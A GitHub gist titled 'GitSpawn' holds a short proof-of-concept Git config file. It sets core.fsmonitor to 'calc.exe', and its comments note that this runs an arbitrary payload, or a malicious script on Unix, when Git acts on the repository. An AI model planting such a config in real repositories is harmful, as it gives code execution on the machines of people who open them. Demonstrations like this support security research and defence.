Skip to content

Instantly share code, notes, and snippets.

@up1
Created September 8, 2026 04:10
Show Gist options
  • Select an option

  • Save up1/18b59871fde7ee28d9e819cf3db3681b to your computer and use it in GitHub Desktop.

Select an option

Save up1/18b59871fde7ee28d9e819cf3db3681b to your computer and use it in GitHub Desktop.
GitSpawn
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
# The fsmonitor configuration points to an arbitrary payload/command
fsmonitor = "calc.exe"
# On Unix-like systems, this could execute an arbitrary malicious script:
# fsmonitor = "/path/to/malicious_script.sh"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment